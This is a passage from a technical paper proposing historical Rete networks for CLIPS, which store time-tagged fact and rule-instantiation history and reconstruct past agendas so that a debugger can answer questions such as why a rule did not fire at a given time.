CLIPS uses an agenda, a priority queue containing the currently-eligible rule instantiations in the order that they should be fired (if they stay on the agenda long enough); the one on top of the agenda will be the next chosen to fire. An agenda of size \(n\) does not necessarily display the next \(n\) rules that will be fired, however, because each rule-firing has the potential to change working memory, causing rule instantiations to be added to and deleted from the agenda. CLIPS uses the following conflict resolution strategy (COSMIC 1989):
1. The instantiations are ordered by the salience, or priority, of the rules involved; the instantiation with the highest salience is on top of the agenda.
2. If instantiations have the same salience, then the one which became true most recently is preferred over earlier ones by being placed nearer to the top of the agenda.
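The two-level ordering above amounts to a compound sort key. The following Python sketch illustrates the idea (it is not CLIPS's internal implementation; the dictionary field names are our own):

```python
# Illustrative sketch of CLIPS's default conflict resolution: order rule
# instantiations by salience (higher first), breaking ties by recency
# (the instantiation that became true later is preferred).

def agenda_order(instantiations):
    """Sort as CLIPS's default strategy would: highest salience on top;
    among equal salience, the most recently true instantiation first."""
    return sorted(instantiations,
                  key=lambda inst: (-inst["salience"], -inst["became_true"]))

agenda = agenda_order([
    {"rule": "rule-a", "salience": 0,  "became_true": 3},
    {"rule": "rule-b", "salience": 10, "became_true": 1},
    {"rule": "rule-c", "salience": 0,  "became_true": 5},
])
# rule-b tops the agenda (highest salience); rule-c precedes rule-a
# because it became true more recently.
```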
B. Time-Related Considerations
Before we can modify Rete to store historical information, we need to decide on some time scale, so that we can store the data needed to determine when and in what order rules fired, and when facts were (and were not) in working memory. To further facilitate debugging, we would like a time-unit that is central to CLIPS program operation. Conceptually, rule-firings are the major units of action in a CLIPS program. Computations are done when a rule fires, and the computations performed are those of the selected rule.
The Transparent Rule Interpreter (TRI), a graphical debugger for forward-chaining rule-based languages described in (Domingue and Eisenstadt 1989), uses rule-firings as the 'time' scale in its 'musical score' framework for graphically representing forward-chaining execution. Also, note that the existing debugging aids within CLIPS are rule-firing based. As previously mentioned, CLIPS allows system builders to run a program one rule-firing at a time, in order to more closely examine its execution while debugging; the single step in this single-stepping process is one rule-firing. And, the CLIPS (run) command concludes by printing out how many rules have fired during the program execution, and if one chooses to display rule-firing information during program execution, then each is numbered by its order of occurrence within the run. The rule-firings are considered a measure of how much or how little has occurred. Therefore, it is quite natural to use rule-firings as a time basis. A counter starts at zero at the beginning of each run and is incremented with each rule-firing. This also has the useful feature of being comparable between runs; for example, running the same program with the same data twice, the fifth rule to fire does so at the same 'time' in both runs — at time counter value five — which can make it easier to compare and contrast, for example, two runs of the same program using slightly different sets of facts.
C. Historical Rete Networks
Historical Rete networks, proposed by this paper, differ from classical Rete networks in two major respects: each instantiation stored within the network has a time-tag, which gives the period(s) of time that the instantiation was in effect, and each memory node has its contents partitioned into two sets: a current partition, containing all instantiations currently in effect, and a past partition, containing all instantiations in effect earlier in this run.
A time-tag is a set of one or more intervals stored with a fact or instantiation, which gives the time period(s) during a run that the fact or instantiation was in effect. For brevity, we will use 'true' to describe a fact in working memory, an instantiation representing a condition or conditions satisfied by working memory, and an eligible rule instantiation. (Note that, because of refraction ((Brownston et al. 1985), pp. 62-63), a rule instantiation that fires becomes ineligible, even if its RHS actions do not cause any of its LHS conditions to become unsatisfied, until at least one of its facts is retracted and asserted again.)
This time-tag is different from the time tag mentioned in (Brownston et al. 1985), p. 43, because that time tag is associated just with facts, and not also with instantiations as ours is, and it consists of only one integer, representing when that fact joined working memory or was last modified. The time-tags we use store more information, about both facts and instantiations. An interval is a component (x y) in a time-tag, in which x was the time when that fact or instantiation became true and y was the time when it became no longer true — when the fact was retracted from working memory, when one or more conditions represented by an instantiation were no longer satisfied, or, for a rule instantiation, when it left the agenda. An open interval indicates that the fact or instantiation is still true; we write such an interval as (x *).
Time-tags are found in the wme hash table and the historical Rete network. Each wme hash table entry now also includes the time-tag for that fact. When a fact is retracted from working memory, its entry is not removed from the table; instead, the open interval in its time-tag is closed with the current time. So, the wme hash table stores all the facts that are or have been in working memory during this program run. We can tell if a fact is currently true by simply seeing if the last interval of its time-tag is open. (The wme hash table entry should probably also store all of the fact-ids that a fact has had during a run.)
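A minimal sketch of such a wme hash table, with time-tags as lists of intervals, might look as follows (Python used purely as illustration; `None` plays the role of '*', and all names are our own):

```python
# Sketch of a wme hash table entry with a time-tag: a list of intervals,
# where None stands for '*' (an open interval). Not CLIPS internals.

wme_table = {}

def assert_fact(fact, t):
    wme_table.setdefault(fact, []).append([t, None])   # open interval (t *)

def retract_fact(fact, t):
    wme_table[fact][-1][1] = t                         # close (x *) -> (x t)

def currently_true(fact):
    tag = wme_table.get(fact)
    return bool(tag) and tag[-1][1] is None            # is last interval open?

assert_fact("(p 1 3)", 0)
retract_fact("(p 1 3)", 2)    # retracted at time 2: time-tag becomes ((0 2))
assert_fact("(q 3 5)", 1)     # still true: time-tag ((1 *))
```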
The time-tags give the time period(s) during a run that a fact or instantiation was true, and so they are part of the run's historical information. The partitions, on the other hand, serve a very different purpose: they allow the basic Rete network operation to be surprisingly unchanged by the addition of time-tags and the resulting effect that instantiations do not leave the historical Rete network. (Instantiations that no longer hold have their time-tags' intervals closed, but those instantiations are not actually removed from the network.) If we keep a memory node's no-longer-true instantiations in a past partition, then the instantiations in each memory node's current partition are exactly those that would appear in the corresponding 'normal' Rete network memory node. This, then, allows most historical Rete network operations to take place as in a 'normal' Rete network: the actions that involve all instantiations in normal Rete now involve all instantiations in current partitions only in historical Rete.
```
(defrule rule-1
    ?p-addr <- (p ?X ?Y)
    (q ?Y ?Z)
    (r ?X ?W)
    =>
    (assert (r ?X ?Z))
    (retract ?p-addr))

(defrule rule-2
    (r ?X ?W)
    (s ?Z ?X)
    =>
    (assert (q =(* ?W ?X) ?Z)))
```
Table 2. Rules for Historical Rete Example
Figure 2 shows a historical Rete network as it would be right before time 4 for the initial facts given and for the rules in Table 2. Following the chronology shown in Figure 2, one can see how the facts propagate through the historical Rete network, how the time-tags are set, and how instantiations come and go (and move from current to past partitions). As shown, the instantiation of rule-2 matching facts (r 4 6) and (s 2 4) will be the next to fire, at time 4. The action is basically the same as a classical Rete network, but now one can see such historical details as, for example, why rule-1 could not fire at time 3: because it had no true instantiations then.
Conceptually, a historical Rete network will look like figure 2; however, for performance reasons, we will likely implement it slightly differently; for example, we will very likely incorporate hashing into it. Hashing has been proposed for Rete networks to improve performance (for example, in (Gupta et al. 1988)); it will be useful for historical Rete networks as well. In particular, past partitions of nodes should be hashed, so that a particular past partition entry can be found in constant time (in the average case).
When a fact is asserted into a historical Rete network at time counter value \( t \), it has the time-tag \( (t \ast) \) added to its wme hash table entry and also to any new instantiations resulting from its propagation through the historical Rete network. The propagation through the historical Rete network is essentially the same as for a "classical" Rete network, except that
(a) each new instantiation that results is placed in the corresponding memory node's current partition (instead of in its 'only' partition, in the normal case),
(b) beta tests are performed for instantiations in current partitions (but these current partitions contain the same instantiations as the 'only' partitions in the normal case), and
(c) (as already mentioned) each instantiation that results from asserting this fact has the time-tag interval (t *) appended to it.
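Steps (a)–(c) above can be sketched as follows (an illustrative memory node only; real nodes also carry the match and join tests, and the class and field names are our own):

```python
# Sketch of a historical Rete memory node with current/past partitions.
# Asserting at time t adds new instantiations to the current partition
# with an open interval (t *); None stands for '*'.

class MemoryNode:
    def __init__(self):
        self.current = {}   # instantiation -> its single open interval [t, None]
        self.past = {}      # instantiation -> list of closed intervals

    def add_instantiation(self, inst, t):
        self.current[inst] = [t, None]     # steps (a) and (c)

    def matching(self):
        return list(self.current)          # step (b): tests see current only

node = MemoryNode()
node.add_instantiation(("(p 1 3)", "(q 3 5)"), 1)
```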
```
time 0: (initialise working memory)
        assert (p 1 3), (p 7 9), (r 4 6),
               (r 1 3), (s 2 4), (s 5 1)
time 1: FIRE rule-2 (r 1 3)(s 5 1)
        ASSERT (q 3 5)
time 2: FIRE rule-1 (p 1 3)(q 3 5)(r 1 3)
        ASSERT (r 1 5)
        RETRACT (p 1 3)
time 3: FIRE rule-2 (r 1 5)(s 5 1)
        ASSERT (q 5 5)
```

Figure 2. A Historical Rete Network
When asserting a fact, the computational cost of keeping historical information is quite low. The computations for deciding if an instantiation has to be propagated are still the same as in the original network. The only additional computational overhead comes from adding the time-tag intervals to each fact and instantiation, and from updating any node hash tables being used as necessary.
Retracting a fact from the historical Rete network at time counter value \( t \) has a few additional differences compared to its "classical" Rete counterpart. In a "classical" Rete network, the wme hash table entry for the fact to be retracted is found, and the pointers within this entry to every alpha node matching this fact are traversed in turn. From each alpha node matching this fact, we remove any instantiations making use of the retracted fact, and then continue to all the nodes reachable from this alpha node, searching for, and removing if found, any instantiations using the fact being retracted. When done with all of that, the fact's wme hash table entry is deleted.
In a historical Rete network, the process is basically the same — we find the fact's wme hash table entry, follow its pointers to the alpha nodes matching this fact, and search from each of these alpha nodes for all of the instantiations using this fact. Where we searched all the instantiations in the "only" partition of each encountered memory node in the "classical" case, now we search only the instantiations in the current partition (which has the same collection of instantiations as the classical Rete network's only partition, for each memory node). Instead of deleting those instantiations that make use of the fact being retracted, we move them from the current partition to the past partition of their memory nodes, and close the open interval in their time-tags with the current time-counter value. (For example, if the open interval was \((a \ast)\), and the current time counter value is \(t\), then the time-tag interval becomes \((a t)\).) Finally, when done with all that, instead of removing the wme hash table entry, we merely close the open interval in its time-tag with \(t\).
Comparing retraction in the historical and regular cases, most of the differences are minor: the entry is removed from the wme hash table in the regular case, but just has its open time-tag interval closed in the historical case, and each instantiation using the retracted fact is deleted from the network in the regular case, but is moved from the current to the past partition of its memory node in the historical case, with its time-tag also closed with the current time counter value. However, there is a bit more work than might be apparent in moving an instantiation from the current to the past partition. To keep things most straightforward if an instantiation is true for more than one period of time (for example, if a rule contains a negated condition that is true, then false, then true again), we would like to keep no more than one entry per instantiation in a memory node's past partition; this will require a search of the past partition. If a previous instance of this instantiation is found, we append the newly closed time-tag to it, and if not, then we add a new entry with the instantiation and its newly closed time-tag. Fortunately, if we hash the past partitions, then this search will take constant time, in the average case.
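The move from current to past partition, including the merge with an existing past entry, can be sketched as follows (an illustrative fragment; the hashed past partition is modeled as a Python dict, and all names are our own):

```python
# Sketch of retirement in a historical Rete memory node: move an
# instantiation from the current to the past partition, closing its open
# interval with the current time t; append the closed interval to any
# existing past entry so each instantiation has at most one past record.

def retire(node, inst, t):
    """node has dict 'current' (inst -> [start, None]) and dict 'past'
    (inst -> list of closed intervals); hashing gives average-case O(1)
    lookup of a past entry."""
    start, _open = node["current"].pop(inst)
    node["past"].setdefault(inst, []).append([start, t])

# i was true over (0 1) earlier, and again since time 3; retract at time 5.
node = {"current": {"i": [3, None]}, "past": {"i": [[0, 1]]}}
retire(node, "i", 5)
# The single past entry for i now covers both periods: (0 1) and (3 5).
```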
Here is a simple example, to demonstrate the use of partitions. Let \(i\) be an instantiation that was true between times \(a\) and \(b\) and between times \(c\) and \(d\). When it became true at time \(a\), its time-tag was \((a \ast)\), and it clearly belonged in the current partition of the appropriate memory node. When it became no longer true at time \(b\), its interval was closed, resulting in the time-tag \((a b)\), and \(i\) was removed from its memory node's current partition and moved into its past partition. At time \(c\), it became true again.
There are a number of possibilities about how to proceed; we will leave the past instance of this instantiation in the past partition and create a current instantiation in the current partition. Keeping two copies of an instantiation when it is true and has been false in the past, one in each partition, simplifies run-time operation of the historical Rete network. It allows us to assume that instantiations in current partitions have exactly one interval, which is known to be open, in their time-tags. It also lets us avoid accessing the past partition when adding an instantiation. However, as mentioned, the past partitions will be accessed when instantiations are removed from current partitions, so that the newly-closed time-tag can be appended to an existing entry, if one exists. That way, each instantiation has at most one entry in its memory node's past partition, whose time-tag includes all of the time periods that this instantiation was true, instead of having a past partition entry for each interval that the instantiation was true.
So, assuming that \(i\) is the only instantiation in its memory node, then after time \(b\) and before time \(c\) the memory node's partitions are as shown in Table 3:
<table>
<thead>
<tr>
<th>Current partition</th>
<th>Past partition</th>
</tr>
</thead>
<tbody>
<tr>
<td>(empty)</td>
<td>i, time-tag: (a b)</td>
</tr>
</tbody>
</table>
Table 3. After time b, before time c
Now, when i becomes true again at time c, the past instance of the instantiation will be in the past partition, and the current instance will be in the current partition, as shown in Table 4:
<table>
<thead>
<tr>
<th>Current partition</th>
<th>Past partition</th>
</tr>
</thead>
<tbody>
<tr>
<td>i, time-tag: (c *)</td>
<td>i, time-tag: (a b)</td>
</tr>
</tbody>
</table>
Table 4. After time c, before time d
Finally, when i becomes false again at time d, then the current instance is removed from the current partition, and the now-closed time interval is added to the existing past partition entry's time-tag, as shown in Table 5:
<table>
<thead>
<tr>
<th>Current partition</th>
<th>Past partition</th>
</tr>
</thead>
<tbody>
<tr>
<td>(empty)</td>
<td>i, time-tag: (a b)(c d)</td>
</tr>
</tbody>
</table>
Table 5. After time d
These preliminary intuitions suggest that the addition of time-tags and current and past partitions does not fatally increase the overhead of asserting facts to and retracting facts from the historical Rete network. They also suggest that we will meet our goal of keeping the run-time operation of the historical Rete network reasonably close to that of the original version, while still allowing historical information to be maintained within. The major cost will be the storage of the historical information.
III. AGENDA RECONSTRUCTION
Since the agenda determines which rule fires next, its changing contents and their order are part of a run's historical information. And, for answering certain debugging-related questions, the agenda's state at a particular time will, indeed, be needed. For example, consider the question "Why did rule X not fire at time T?". Using the historical information in the historical Rete network, we can find out, from rule X's production node, if any instantiations of rule X were true — and thus eligible to fire — at time T. (Any rule instantiation whose time-tag has an interval containing T was eligible at time T.) However, once we find that it was true then, we need the agenda from that time to obtain further details about why rule X did not fire. For example, with the agenda, we can see how many other rule instantiations were above rule X's highest instantiation. Such details may make it easier to determine what would be needed for rule X to fire at time T.
Since past states of the agenda may be useful in debugging a CLIPS program, we need to determine how to handle agenda history. We would like to avoid storing a copy of the agenda for every value of the time counter, because the potentially large number of instantiations in common between 'consecutive' agenda copies makes this seem like a poor use of space. It seems preferable to store enough information to reconstruct an agenda copy when desired. This reconstructed copy could be used by an explanation system to answer
questions, could be printed for direct system builder use, or could be modified to answer follow-up questions. Furthermore, the information used to reconstruct the agenda may also be useful for other purposes, perhaps more conveniently than if it were in the form of literal agenda copies.
Our current plan is to use information stored with only moderate redundancy to reconstruct the agenda at a particular time reasonably quickly. The needed information will be stored in an agenda-changes list, containing a chronological list of all changes made to the agenda during a program run. Three kinds of changes are possible: a rule instantiation can be added (an ADD), a rule instantiation can be removed to be fired (a DEL/FIRE), and a rule instantiation can be removed because at least one of the rule's LHS conditions is no longer satisfied by working memory (a DEL/REMOVE). Each change also includes the time of that change, even though the list is ordered, for easy searching for changes from a particular time period. And, finally, each agenda-changes entry also contains some representation of the instantiation being added, deleted/fired, or deleted/removed. Notice that, for any single time counter value, there will be exactly one DEL/FIRE entry, and zero or more DEL/REMOVE's and ADD's.
To construct a copy of the agenda as it was at time counter value T, we basically search the agenda-changes list entries from time 0 to time T. Then, for each ADD, we see if it was still on the agenda at time T, and if so, we add it to the agenda copy being constructed. We must start at the beginning of the agenda-changes list each time because a very-low-priority rule may be instantiated from the very beginning of a run, but not fired for a very long time because other rules always take priority. However, we can, of course, safely ignore all changes made to the agenda after time T.
To see if an ADD'ed instantiation from the agenda-changes list was removed from the agenda before time T, we think the best approach will be to search for the instantiation's entry in the past partition of its rule's production node. With hashed past partitions, this should normally take constant time. If found, then we find the time-tag interval beginning with the time of this ADD (after all, this rule instantiation was added to the agenda at this time because it had become eligible). If this interval was closed before time T, then this instantiation was not on the agenda at time T, and we do not need to add it to our agenda copy. Otherwise, it was still eligible then, and we should add it. (If the instantiation is not found in the past partition, then it is in the current partition, in which case, being still true currently, it also was true at time T, and should be added to the agenda copy. Notice, however, that this can only occur if an agenda copy is being constructed during a run, for example while single-stepping through it.)
Using the production node in this way should take less time than other alternatives, which involve possibly time-consuming searches of other, non-hashed data structures. For example, we could add every ADD'ed instantiation encountered to the agenda copy, and then could remove any that left before time T as we come to their DEL/FIRE's or DEL/REMOVE's. However, that would involve a search of the agenda copy every time that an instantiation had to be removed. Similarly, for each ADD'ed instantiation, we could search down the agenda-changes list to see if it has a DEL/FIRE or DEL/REMOVE before time T; but, this would involve searching down the agenda-changes list for each ADD'ed instantiation.
A pleasant advantage to handling the ADD's in chronological order is that they can be added to the agenda copy using the same means that the system adds instantiations to the agenda during run-time, using CLIPS' conflict resolution strategy. For each ADD'ed instantiation that was still on the agenda at time T, we start at the top of the agenda copy, and compare the salience of the 'new' instantiation to that of each of the instantiations on the copy in turn, until reaching one whose salience is the same as or less than the 'new' instantiation's salience. The 'new' instantiation will be placed directly above that instantiation. We can safely stop searching down the copy after reaching one with the same salience because, since we are handling the ADD's in chronological order, recency dictates that this new instantiation, joining the agenda later than any of those already in the copy,
should go on top of those with the same salience.
Here is a simple example of agenda reconstruction. We have an agenda-changes list as shown on the left in Figure 3, in which we use letters to represent rule instantiations. To make the figure easier to read, current and past partitions are not indicated. Assume that the saliences of the instantiated rules labelled by A, B, C, F, and G are all zero, and that those of D and E are 1.

Agenda-changes list:
<table>
<thead>
<tr>
<th>Time</th>
<th>Action</th>
<th>Rule</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>ADD</td>
<td>A</td>
</tr>
<tr>
<td>0</td>
<td>ADD</td>
<td>B</td>
</tr>
<tr>
<td>0</td>
<td>ADD</td>
<td>C</td>
</tr>
<tr>
<td>1</td>
<td>DEL/FIRE</td>
<td>C</td>
</tr>
<tr>
<td>1</td>
<td>ADD</td>
<td>D</td>
</tr>
<tr>
<td>1</td>
<td>DEL/REMOVE</td>
<td>A</td>
</tr>
<tr>
<td>1</td>
<td>ADD</td>
<td>E</td>
</tr>
<tr>
<td>2</td>
<td>DEL/FIRE</td>
<td>E</td>
</tr>
<tr>
<td>3</td>
<td>ADD</td>
<td>F</td>
</tr>
<tr>
<td>4</td>
<td>ADD</td>
<td>G</td>
</tr>
<tr>
<td>5</td>
<td>DEL/FIRE</td>
<td>G</td>
</tr>
</tbody>
</table>
Production Nodes from Historical Rete Network:
1. A, time-tag: (0 1)
2. B, time-tag: (0 *)
3. C, time-tag: (0 1)
4. D, time-tag: (1 3)
5. E, time-tag: (1 2)
6. F, time-tag: (3 *)
7. G, time-tag: (3 4)
To reconstruct the agenda from right before time 2, before E fired, we start at the top of the agenda-changes list; the first entry is the addition of A. We check its entry in its rule's production node, and see that it was removed from the agenda at time 1, and so does not belong in the copy. The next entry is the addition of B at time 0. B does not have a past partition instance at this time, as it is still on the agenda, and so it was also on the agenda at time 2; B becomes the first instantiation in the copy.
C is also added at time 0, but is removed — by being fired — at time 1, so it is not put on the copy. Since the next entry is a DEL/FIRE, we go on to the entry after that, the addition of D. D is not removed until time 3, so it belongs on the copy. D's rule's salience of 1 is greater than B's, which is 0, so D is placed on top of B, as shown in Table 6:
<table>
<thead>
<tr>
<th>Rule</th>
<th>Salience</th>
</tr>
</thead>
<tbody>
<tr>
<td>D</td>
<td>1</td>
</tr>
<tr>
<td>B</td>
<td>0</td>
</tr>
</tbody>
</table>
Table 6. D added to agenda copy
The next entry is ignored, since it is a DEL/REMOVE. For the next, E should be in the copy, since it was still on the agenda right before time 2; its salience is the same as D's, but E is more recent, and so E goes on top of D, as shown in Table 7. The next entry occurred at time 2, and so, since we want the copy to be as the agenda was right before time 2, we stop now. The final agenda copy is the one shown in Table 7. If one writes out the agenda from time 0 onward, adding and deleting as specified, one sees that this is, indeed, the state of the agenda as it was right before time 2.
<table>
<thead>
<tr>
<th>Rule</th>
<th>Salience</th>
</tr>
</thead>
<tbody>
<tr>
<td>E</td>
<td>1</td>
</tr>
<tr>
<td>D</td>
<td>1</td>
</tr>
<tr>
<td>B</td>
<td>0</td>
</tr>
</tbody>
</table>
Table 7. E added to agenda copy
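The reconstruction procedure just illustrated can be sketched as follows. The data structures and function names are assumptions for illustration, with example data following the production-node time-tags listed above: walk the ADD entries before time T, keep those still eligible at T (checked against the production node's past partition), and insert each by salience, with later arrivals placed above equal-salience entries (recency).

```python
def still_eligible(inst, add_time, T, past):
    """past maps an instantiation to its closed (start, end) intervals.
    An instantiation absent from the past partition is still current."""
    for start, end in past.get(inst, []):
        if start == add_time:   # the interval opened by this ADD
            return end >= T     # still on the agenda right before time T?
    return True                 # still in the current partition

def reconstruct(changes, T, past, salience):
    agenda = []                 # front of the list = top of the agenda
    for time, action, inst in changes:
        if time >= T:
            break               # ignore all changes from time T onward
        if action != "ADD" or not still_eligible(inst, time, T, past):
            continue
        pos = 0                 # insert below strictly higher saliences;
        while pos < len(agenda) and salience[agenda[pos]] > salience[inst]:
            pos += 1            # stop at equal salience: recency wins
        agenda.insert(pos, inst)
    return agenda

changes = [(0, "ADD", "A"), (0, "ADD", "B"), (0, "ADD", "C"),
           (1, "DEL/FIRE", "C"), (1, "ADD", "D"), (1, "DEL/REMOVE", "A"),
           (1, "ADD", "E")]
past = {"A": [(0, 1)], "C": [(0, 1)], "D": [(1, 3)], "E": [(1, 2)]}
salience = {"A": 0, "B": 0, "C": 0, "D": 1, "E": 1}
print(reconstruct(changes, 2, past, salience))  # ['E', 'D', 'B']
```

The result matches Table 7, and asking for time 1 instead reproduces the agenda right before C fired.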
One might question why the DEL/FIRE's and DEL/REMOVE's are kept in the agenda-changes list at all, since they are ignored during agenda reconstruction. They are worth keeping for when the states of the agenda over a period of time are desired. To observe the agenda between times T and U, having DEL/FIRE's and DEL/REMOVE's in the agenda-changes list keeps the system from having to reconstruct an agenda copy for time T, to then completely reconstruct another for time (T + 1), and so on through time U, starting over at the beginning of the agenda-changes list each time. With the DEL/FIRE's and DEL/REMOVE's, the system can instead reconstruct the agenda for time T, then apply each of time (T + 1)’s agenda-changes list entries to the copy, resulting in time (T + 1)’s agenda, and so on to time U, updating the previous time value’s copy instead of completely rebuilding it each time. Similarly, the DEL/FIRE’s and DEL/REMOVE’s allow us to show what happened to the agenda, and in what order, during a single value of the time counter, if that is desired by the system builder.
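The incremental update described here can be sketched as a small routine that applies one time value's changes to an existing copy; this is a toy illustration, with insertion using the same salience-then-recency rule as reconstruction.

```python
def apply_changes(agenda, changes_at_t, salience):
    # Update an existing agenda copy with one time value's changes,
    # rather than rebuilding it from the start of the agenda-changes
    # list; this is what keeping DEL/FIRE and DEL/REMOVE entries buys.
    for _, action, inst in changes_at_t:
        if action == "ADD":
            pos = 0
            while pos < len(agenda) and salience[agenda[pos]] > salience[inst]:
                pos += 1
            agenda.insert(pos, inst)
        else:  # "DEL/FIRE" or "DEL/REMOVE"
            agenda.remove(inst)
    return agenda

copy_before_2 = ["E", "D", "B"]   # agenda right before time 2 (see Table 7)
copy_before_3 = apply_changes(copy_before_2, [(2, "DEL/FIRE", "E")],
                              {"E": 1, "D": 1, "B": 0})
print(copy_before_3)  # ['D', 'B']
```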
IV. USING THE HISTORICAL RETE NETWORK TO ANSWER QUESTIONS FOR DEBUGGING
We will now consider how a CLIPS program run’s historical Rete network and associated data structures can be used by an explanation subsystem in answering several types of questions useful for debugging. We will not discuss all the aspects involved in answering these questions, but will instead concentrate on which historical data should be collected for use in eventually answering them, and how to obtain this information.
A. When was fact F in working memory?
This question is very simple to answer using the stored historical information, and is also very useful for debugging. For example, if F is a control fact, asserted to indicate that the program has identified a particular sub-situation, then knowing when F was in working memory lets the system builders know when that sub-situation was considered during the run, if ever. If a discovered fault involves F, then knowing when F was in working memory lets the system builders narrow their attention to the periods of the run when F could have played a part in that fault.
Finding out when fact F was in working memory is even easier than finding out what rule (probably) asserted it, since we plan to include time-tags in the wme hash table. All we need to do is access fact F's wme hash table entry, and copy the time-tag from that entry (and probably the corresponding fact-id(s) as well). For example, if F's time-tag is (a b)(c d), then F was in working memory from the ath rule firing to the bth rule firing, and then again from the cth rule firing to the dth rule firing. Since CLIPS associates a different fact-id with each new assertion of a fact (following a retraction), it would also be potentially useful to the system builders to include with each time period the fact-id assigned to the fact during that period.
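The lookup itself amounts to no more than a hashed access. A sketch, with invented fact names, times, and fact-ids:

```python
# Hypothetical wme hash table: fact -> list of ((start, end), fact-id)
# pairs, one per period the fact was in working memory; None marks an
# interval that is still open. All names and values are invented.
wme = {"(status landed)": [((3, 9), "f-12"), ((14, None), "f-31")]}

def when_in_wm(fact):
    """Answer 'When was fact F in working memory?' with one lookup."""
    return wme.get(fact, [])

print(when_in_wm("(status landed)"))
# [((3, 9), 'f-12'), ((14, None), 'f-31')]
```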
There is also the possibility of giving the system builders the time periods in a form
other than the relative rule-firings; for example, the time-periods could be expressed as the
actual rule instantiations that fired, or as the actions that were done. However, whether this
would be better for debugging, how such an answer can be expressed clearly, and how the
system builders can perhaps be allowed to specify dynamically which they would prefer, are
still open questions.
B. What facts matched LHS condition \( L \), and when?
This question could be useful for debugging when the system builder is interested in strange
program behavior related to a particular LHS condition. If the system builder considers
this condition to be key to one or more rules' firing, then knowing what satisfied it, and
when, may shed light on why rules containing this LHS condition did or did not fire. The
facts which satisfied \( L \), and when each was in working memory, can be used in subsequent
questions; and, if \( L \) was never satisfied, then that in itself may reveal to the system builders
why certain actions were not performed by the program.
Given the historical Rete network, answering this question will be easy, as long as \( L \)
is indeed a LHS condition in one of the rules. We access this LHS condition's alpha node
within the historical Rete network; each instantiation stored in that alpha memory, whether
in the current or past partition, corresponds to one fact that matched \( L \). Moreover, each
instantiation contains the time-tag giving when that fact matched \( L \). So, this alpha node's
contents constitute the data for answering this question.
C. What fired rule instantiations' LHS's included fact \( F \)?
This question allows system builders to easily find out which rule firings actually made use
of a particular fact. For example, this could reveal, if \( F \) should not have been in working
memory, just how much "damage" it caused, in terms of instantiations firing that should not
have fired. The answer to this question can also make visible some of the effects of a previous
instantiation firing: if one fired instantiation asserts fact \( F \), and the system builders want to
see if that action directly contributed to other actions, then the answer to this question gives
them that information. And, if \( F \) is a control fact, inserted specifically to control what rule
is to fire in a particular scenario, then if the answer to this question is that no rule fired using
this fact, that could indicate to the system builders (1) that the fact was never in working
memory, or (2) that the rules had an error (for example, a typo, or a missing field) in the
condition that was supposed to correspond to that fact, or even (3) that the rules that were
supposed to assert \( F \) did not do so, or asserted it incorrectly.
Although not directly requested, the answer should include the time periods that
this fact was in working memory. This might be useful, because the system builders might
notice, for example, that during one period the fact contributed to several rules' firing, and
in another it did not. We should also include the time of firing of each rule instantiation
that used this fact: this lets the system builders know when in the run this particular fact
played a role, and it gives them the time information in case they want to follow up this
question with one about why a certain rule instantiation did or did not fire at one of those
time values. And, if the system builders choose to single-step through the run again, they
know which rule-firings to pay particular attention to.
To collect the information for answering this question, we start at the wme hash table
entry for fact \( F \), and copy the time periods that \( F \) was in working memory. Then, using the
hash table entry's pointers to all alpha nodes matching this fact, we travel in turn to each
such alpha node.
From each alpha node that matches \( F \), we travel to all of the production nodes
reachable from that alpha node. (An alpha node may lead to more than one production node because, as stated earlier, if a LHS condition is used in more than one rule, its alpha node is shared in the historical Rete network.) At each of these production nodes, we search its past partition for instantiations containing \( F \). Each found is a rule instantiation that used \( F \), and is no longer eligible — now, we need to see if it actually fired. After all, it may have left the agenda because one of its LHS conditions became unsatisfied before it could fire. We check every time value that it left the agenda — for example, if its time-tag is \( (t\ u)(w\ x) \), then it left the agenda at times \( u \) and \( x \) — and see if the rule instantiation that fired at that time is, indeed, this instantiation. If so, then we have found an instantiation that fired, and that used \( F \), and so it should be added to the list-in-progress of instantiations to be included in the answer. We continue in this way until we have checked all the past partition instantiations in production nodes reachable from alpha nodes for LHS conditions matching \( F \). At that point, we have collected all of the fired rule instantiations that included fact \( F \), and we can present them to the system builder in some reasonable form.
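The final filtering step, checking whether each candidate instantiation actually fired at each time it left the agenda, can be sketched as follows. The data structures are assumptions: fired_at maps a time-counter value to the instantiation that fired then, and the candidates are already restricted to past-partition instantiations whose LHS includes fact F.

```python
def fired_instantiations_using(candidates, fired_at):
    """candidates: instantiation -> closed (start, end) intervals.
    Returns (instantiation, firing time) pairs."""
    answer = []
    for inst, intervals in candidates.items():
        for _, left_at in intervals:
            # It fired at left_at only if it is the recorded firing for
            # that time; otherwise it left via a DEL/REMOVE instead.
            if fired_at.get(left_at) == inst:
                answer.append((inst, left_at))
    return answer

past = {"r1(F, G)": [(0, 4)], "r2(F, H)": [(1, 3), (5, 8)]}
fired = {3: "other", 4: "r1(F, G)", 8: "r2(F, H)"}
print(fired_instantiations_using(past, fired))
# [('r1(F, G)', 4), ('r2(F, H)', 8)]
```

Note that r2's first interval is rejected: it left the agenda at time 3, but a different instantiation fired then.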
D. Why did rule \( X \) not fire at time \( T \)?
This type of question has the potential to be particularly useful for the purpose of debugging. Once system builders notice that a rule that they thought should fire at a particular time did not, having this question available — even with only low-level suggestions for what caused the “error” — could save them much tedium in terms of single-stepping through a run to the time of interest, poring over a long trace of rule firings, and/or adding print statements to particular rules. Knowing why a rule did not fire may lead directly to an error that kept a rule from firing, or it may indicate gaps in the system’s rules (or data). If a particular unsatisfied LHS condition kept it from firing, then the system builders might immediately notice any obvious typos as soon as they are shown that condition. Or, the condition might cause the system builders to think of a fact that they thought was true, and that should have satisfied this condition; that might suggest what question they should ask next. (For example, they might ask what rules have RHS actions that could have asserted that particular fact. This follow-up question does not involve historical information about the run, but it is useful in this particular scenario. Historical information would come into play again with the likely-follow up to that question: why the rules that could have asserted that fact did not themselves fire.) If, on the other hand, the rule was eligible to fire at time \( T \), but another fired instead, then knowing the relative saliences of the fired rule and rule \( X \) might give the system builders clues that salience-adjusting is needed, or might point out a rule (or rules) that should not have been eligible at time \( T \), but were.
Again focusing on what historical data should be collected and how it can be obtained, we first reiterate the two basic reasons for a rule not firing: either its LHS was not satisfied, or it was eligible to fire, but was not on top of the agenda. To find out which of these is the case, we start by going to rule \( X \)’s production node in the historical Rete network. We check the time-tags of all of the instantiations in this production node, in both the current and past partitions, and see which, if any, contain intervals including \( T \). Each such instantiation was eligible to fire at time \( T \), and we should add it to a list of instantiations of rule \( X \) that were eligible to fire at that time.
